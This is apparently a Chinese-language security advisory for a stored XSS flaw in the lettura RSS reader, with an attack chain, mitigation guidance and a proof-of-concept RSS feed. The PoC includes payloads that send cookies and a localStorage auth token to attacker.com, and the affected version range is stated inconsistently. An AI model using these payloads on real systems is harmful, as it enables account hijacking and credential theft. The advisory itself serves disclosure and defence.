CVE-2025-15454 | zhanglun lettura RSS Handler XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-15454

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

zhanglun lettura

漏洞概述

CVE-2025-15454是zhanglun lettura应用中存在的存储型跨站脚本（Stored XSS）漏洞，该漏洞影响版本0.1.22及以下。漏洞存在于RSS订阅处理模块的ContentRender.tsx组件中，攻击者可以通过构造恶意的RSS feed内容，在其中嵌入JavaScript脚本代码。当其他用户浏览该RSS feed时，恶意脚本代码会在用户浏览器中执行，从而窃取用户会话cookie、劫持用户账户或进行其他恶意操作。由于该漏洞需要用户交互触发（用户需要浏览攻击者精心构造的RSS内容），且攻击复杂度较高，因此CVSS评分仅为3.1（低危）。然而，存储型XSS漏洞的危害不容忽视，攻击者一旦成功利用，可能导致敏感信息泄露和账户被完全控制。建议用户尽快升级到修复版本或应用官方提供的安全补丁。

技术细节

该漏洞位于zhanglun lettura的RSS订阅处理功能中，具体在src/components/ArticleView/ContentRender.tsx文件。当应用解析和渲染RSS feed内容时，未对用户提供的feed内容进行充分的输入验证和输出编码。攻击者可以创建一个包含恶意JavaScript代码的RSS feed，例如在feed的title、description或其他字段中插入<script>alert(document.cookie)</script>或使用事件处理器如<img src=x onerror=alert(1)>等。当其他用户订阅并浏览该恶意feed时，ContentRender.tsx组件会直接将未经过滤的内容渲染到DOM中，导致嵌入的JavaScript代码在用户浏览器上下文中执行。由于RSS feed通常会被持久化存储在客户端或服务端，这种XSS漏洞属于存储型XSS，危害性较大。攻击者可以利用此漏洞窃取认证令牌、进行钓鱼攻击或传播恶意内容。修复方案（commit 67213093db9923e828a6e3fd8696a998c85da2d4）应对RSS内容添加适当的HTML转义和内容安全策略。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标应用zhanglun lettura，并确认其版本是否在0.1.22及以下，同时分析RSS Handler组件的处理逻辑

STEP 2

恶意内容制作

攻击者构造包含XSS payload的恶意RSS feed，可以在title、description等字段中嵌入JavaScript代码，如<script>标签或事件处理器

STEP 3

投递阶段

攻击者将恶意RSS feed托管在攻击者控制的服务器上，或通过其他方式让目标用户订阅该恶意feed

STEP 4

触发阶段

目标用户使用zhanglun lettura订阅并浏览该恶意RSS feed，ContentRender.tsx组件未经过滤直接渲染内容

STEP 5

代码执行

恶意JavaScript代码在用户浏览器上下文中执行，可窃取cookie、localStorage、进行钓鱼等恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-15454 PoC: Malicious RSS Feed with XSS Payload -->
<!-- Attackers can create a malicious RSS feed to exploit the XSS vulnerability -->

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Malicious RSS Feed - CVE-2025-15454</title>
    <link>https://example.com</link>
    <description>RSS feed containing XSS payload</description>
    <item>
      <title>CVE-2025-15454 XSS Test</title>
      <link>https://example.com/article1</link>
      <description>
        <![CDATA[
          <script>alert('XSS - CVE-2025-15454')</script>
          <!-- Alternative payload using img tag -->
          <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
          <!-- SVG-based payload -->
          <svg/onload=fetch('https://attacker.com/log?data='+localStorage.getItem('auth'))>
        ]]>
      </description>
      <pubDate>Sun, 05 Jan 2026 00:00:00 GMT</pubDate>
    </item>
  </channel>
</rss>

<!-- PoC Usage:
1. Host the malicious RSS feed on a server
2. Subscribe to the feed in zhanglun lettura application
3. When the feed content is rendered, the XSS payload will execute
-->

影响范围

zhanglun lettura < 0.1.22

防御指南

临时缓解措施

在官方修复版本发布之前，建议暂时禁用不信任来源的RSS订阅，限制订阅来源仅限已知可信的feed。同时可以在浏览器端安装安全插件（如NoScript）来防护XSS攻击。对于开发者，应尽快应用官方提供的安全补丁（67213093db9923e828a6e3fd8696a998c85da2d4），对RSS内容渲染逻辑进行安全加固，添加适当的输出编码和内容过滤。